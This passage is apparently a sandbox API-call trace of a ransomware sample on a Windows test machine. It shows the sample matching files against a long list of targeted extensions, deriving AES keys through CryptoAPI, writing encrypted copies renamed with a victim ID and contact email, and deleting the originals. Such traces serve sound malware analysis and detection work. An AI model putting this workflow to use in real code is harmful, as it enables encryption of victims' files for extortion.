.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.206] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.206] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.207] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.209] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0x17b9, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0x17b9, lpOverlapped=0x0) returned 1
	[0183.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.212] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb2a8) returned 1
	[0183.214] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.214] CryptCreateHash (in: hProv=0xfcb2a8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0183.214] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.214] CryptHashData (hHash=0xfb8eb0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.214] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.215] CryptDeriveKey (in: hProv=0xfcb2a8, Algid=0x6610, hBaseData=0xfb8eb0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb8f70) returned 1
	[0183.215] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.215] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x17b9, dwBufLen=0x17b9 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x17c0) returned 1
	[0183.215] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.215] RtlMoveMemory (in: Destination=0xfdf950, Source=0xfde188, Length=0x17b9 | out: Destination=0xfdf950) 
	[0183.216] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.216] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdf950*, pdwDataLen=0x18a1ec*=0x17b9, dwBufLen=0x17c0 | out: pbData=0xfdf950*, pdwDataLen=0x18a1ec*=0x17c0) returned 1
	[0183.216] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.216] CryptDestroyKey (hKey=0xfb8f70) returned 1
	[0183.216] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.217] CryptDestroyHash (hHash=0xfb8eb0) returned 1
	[0183.217] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.217] CryptReleaseContext (hProv=0xfcb2a8, dwFlags=0x0) returned 1
	[0183.217] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.217] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.218] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.218] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0183.226] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 109
	[0183.226] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0183.226] WriteFile (in: hFile=0x39c, lpBuffer=0xfdf950*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdf950*, lpNumberOfBytesWritten=0x18a648*=0x17c0, lpOverlapped=0x0) returned 1
	[0183.229] CloseHandle (hObject=0x39c) returned 1
	[0183.230] CloseHandle (hObject=0x390) returned 1
	[0183.230] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf")) returned 1
	[0183.233] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\ngcmroclewn1vtz.swf")) returned 0
	[0183.234] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbcea670, ftCreationTime.dwHighDateTime=0x1d96727, ftLastAccessTime.dwLowDateTime=0xcc67f610, ftLastAccessTime.dwHighDateTime=0x1d975a1, ftLastWriteTime.dwLowDateTime=0xcc67f610, ftLastWriteTime.dwHighDateTime=0x1d975a1, nFileSizeHigh=0x0, nFileSizeLow=0x84bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="VosDngzXDazZXi9nIBz.mp3", cAlternateFileName="VOSDNG~1.MP3")) returned 1
	[0183.234] lstrcmpW (lpString1="VosDngzXDazZXi9nIBz.mp3", lpString2="..") returned 1
	[0183.234] lstrcmpW (lpString1="VosDngzXDazZXi9nIBz.mp3", lpString2=".") returned 1
	[0183.234] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\"
	[0183.234] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\", lpString2="VosDngzXDazZXi9nIBz.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\VosDngzXDazZXi9nIBz.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\VosDngzXDazZXi9nIBz.mp3"
	[0183.234] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\VosDngzXDazZXi9nIBz.mp3") returned 71
	[0183.234] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.234] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\VosDngzXDazZXi9nIBz.mp3", cchLength=0x47 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3") returned 0x47
	[0183.235] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.236] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.236] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3") returned="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3"
	[0183.236] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3") returned 71
	[0183.236] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.237] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0183.237] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.237] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.237] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.238] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.238] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.238] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0x84bd, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0x84bd, lpOverlapped=0x0) returned 1
	[0183.242] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.242] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0183.244] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.244] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0183.244] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.244] CryptHashData (hHash=0xfb95f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.244] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.245] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb95f0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb8ff0) returned 1
	[0183.245] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.245] CryptEncrypt (in: hKey=0xfb8ff0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x84bd, dwBufLen=0x84bd | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x84c0) returned 1
	[0183.246] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.246] RtlMoveMemory (in: Destination=0xfe6650, Source=0xfde188, Length=0x84bd | out: Destination=0xfe6650) 
	[0183.246] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.246] CryptEncrypt (in: hKey=0xfb8ff0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe6650*, pdwDataLen=0x18a1ec*=0x84bd, dwBufLen=0x84c0 | out: pbData=0xfe6650*, pdwDataLen=0x18a1ec*=0x84c0) returned 1
	[0183.249] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.250] CryptDestroyKey (hKey=0xfb8ff0) returned 1
	[0183.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.250] CryptDestroyHash (hHash=0xfb95f0) returned 1
	[0183.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.250] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0183.250] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.252] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.252] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0183.254] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 113
	[0183.254] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0183.254] WriteFile (in: hFile=0x39c, lpBuffer=0xfe6650*, nNumberOfBytesToWrite=0x84c0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe6650*, lpNumberOfBytesWritten=0x18a648*=0x84c0, lpOverlapped=0x0) returned 1
	[0183.259] CloseHandle (hObject=0x39c) returned 1
	[0183.259] CloseHandle (hObject=0x390) returned 1
	[0183.259] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3")) returned 1
	[0183.295] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\vosdngzxdazzxi9nibz.mp3")) returned 0
	[0183.296] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x320c4ad0, ftCreationTime.dwHighDateTime=0x1d9698a, ftLastAccessTime.dwLowDateTime=0xe04a48d0, ftLastAccessTime.dwHighDateTime=0x1d96c92, ftLastWriteTime.dwLowDateTime=0xe04a48d0, ftLastWriteTime.dwHighDateTime=0x1d96c92, nFileSizeHigh=0x0, nFileSizeLow=0x73f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZX28zqUixC5H.odp", cAlternateFileName="ZX28ZQ~1.ODP")) returned 1
	[0183.296] lstrcmpW (lpString1="ZX28zqUixC5H.odp", lpString2="..") returned 1
	[0183.296] lstrcmpW (lpString1="ZX28zqUixC5H.odp", lpString2=".") returned 1
	[0183.300] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\"
	[0183.301] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\", lpString2="ZX28zqUixC5H.odp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\ZX28zqUixC5H.odp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\ZX28zqUixC5H.odp"
	[0183.301] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\ZX28zqUixC5H.odp") returned 64
	[0183.301] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
